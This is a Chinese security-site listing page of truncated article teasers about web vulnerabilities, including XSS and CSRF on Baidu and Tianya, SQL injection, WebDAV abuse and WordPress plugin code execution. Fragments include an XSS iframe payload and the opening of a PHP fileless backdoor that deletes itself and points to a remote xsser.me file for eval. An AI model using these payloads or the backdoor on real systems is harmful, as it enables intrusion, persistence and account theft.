IIS WEBDAV安全配置问题利用 - 网站安全 - 自学php关注热度:28

参考：http: www 2cto com Article 201307 228165 html利用工具 nc第一步：判断nc 192 168 56 101 80OPTIONS HTTP 1 1Host: 192 168 56 101返回HTTP 1 1 200 OKDate: Tue, 03 Sep 2013 03:11:32..[详情]

百度BAE设计不当导致持久型XSS可影响任意帐号关注热度:14

百度BAE任意打 基本只要有站点有注册功能就行求奖品百度BAE任意打 基本只要有站点有注册功能就行我昨天搭建了个网站 创建了个叫iframe src=javascript：alert( 39;XSS 39;) iframe的用户名今天无..[详情]

百度知道存在持久型XSS可拿指定账号 - 网站安全关注热度:11

问题出在，在对提问人的追问下的界面。如图再来看看源代码可以看到未进行任何过滤。顺便看下截取到的XSS可以得出，该xss确实存在，危害自定义..[详情]

万达某分站后台弱口令及SQLin（已进入后台）关注热度:17

无聊又去看了下C段。还是那个系统：（不过以前注射都没进去，这次进去了终于）http: www vans-china cn通过google找到了一个奇葩地址：http: www vans-china cn manuel supplier_manuel htm然后眼睛很尖的..[详情]

人人网某分站逻辑缺陷导致服务器沦陷（可SHEL关注热度:13

应用程序的设计缺陷，外加所处敏感二级如果间接利用，可以构造成特定[XSS、CSRF]蠕虫，严重危害人人网用户隐私安全。 1 分站域名http: blog safe renren comhttp: blog safe renren com ?author=1darr;..[详情]

说说wordpress博客的安全防护 - 网站安全 - 自学p关注热度:12

用一首诗开始我的博文：那时我们有梦，关于文学，关于爱情，关于穿越世界的旅行。如今我们深夜饮酒，杯子碰到一起，都是梦破碎的声音。北岛也许我们无法明白活着的意义，但是..[详情]

PHP无文件后门 - 网站安全 - 自学php关注热度:10

PHP 无文件后门的意思是驻在 php 后台中的 shell。nonshell php?phpunlink($_SERVER[ 39;SCRIPT_FILENAME 39;]);ignore_user_abort(true);set_time_limit(0);$remote_file = 39;http: xsser me eval..[详情]

WordPress Woopra插件任意文件上传+远程代码执行 -关注热度:13

照例e文装逼WordPress Woopra Remote Code Execution：http: www wordpress-secure org index php wordpress-woopra-remote-code-execution 此漏洞对Woopra 1 4 3 1以上版本无效。插件下载地址：http: do..[详情]

MYSQL手工注入某日本网站 - 网站安全 - 自学php关注热度:14

作者：ice 团队：www anying org 转载必须注明。E-mail:1c30day@gmail com经过一天的辛苦劳动下班了，实在无聊，QQ上的基友基本都挂机睡觉了。找点乐子打发时间，看了一下2013年OWASP Top Ten Proj..[详情]

泛微E-office OA管理系统存在任意文件下载及文件上关注热度:18

继续 http: www 2cto com Article 201310 247722 html 的挖掘官方demo http: eoffice8 weaver cn:8028 login php测试账号还是那个 xj存在两个问题：0x01:任意文件下载漏洞测试链接 http: eoffice8 weave..[详情]

天涯CSRF系列四: 利用储存XSS+伪CSRF进行蠕虫攻击关注热度:11

这次的例子将结合一个POST的CSRF来实现蠕虫攻击，这次的蠕虫仅仅是利用一个CSRF来传播，如果用XSS(dom操作)来感染，危害更大。通过发微博，我抓到了一个这样一个POST的地址http: www tia..[详情]

天涯CSRF系列三: 结合储存型XSS定向删除指定用户关注热度:15

这次我们来看看如何利用XSS结合CSRF打造定向攻击再来看一下上次（http: www 2cto com Article 201310 248998 html）的文件引发的又一个问题首先抓包拿到删除微博的URLhttp: www tianya cn api tw?method=tw..[详情]

天涯CSRF系列二: 劫持用户发送消息给任意用户关注热度:9

在CSRF攻击流行之初，曾经有一种错误的观点，认为CSRF攻击只能由GET请求发起，因此很多开发者都认为只要把重要的操作改成只允许POST请求，就能防止CSRF攻击。上次说到GET请求的CSRF(h..[详情]

天涯CSRF系列一:随意劫持用户黑名单操作权限 -关注热度:18

首先给天涯安全工作者普及一下知识。一 CSRF是什么？ CSRF（Cross-site request forgery），中文名称：跨站请求伪造，也被称为：one click attack session riding，缩写为：CSRF XSRF。二 CSRF可以做什么..[详情]

xss获取cifnews.com管理员COOKIE登陆+ashx巧妙提权思路关注热度:25

xss获取管理员COOKIE登陆+巧妙提权思路，通过ashx自动生成文件，虽然最后未提权成功，但希望与各位白帽子相互交流心得，以后遇到此类漏洞会有个先例思路！http: www cifnews com Contribute..[详情]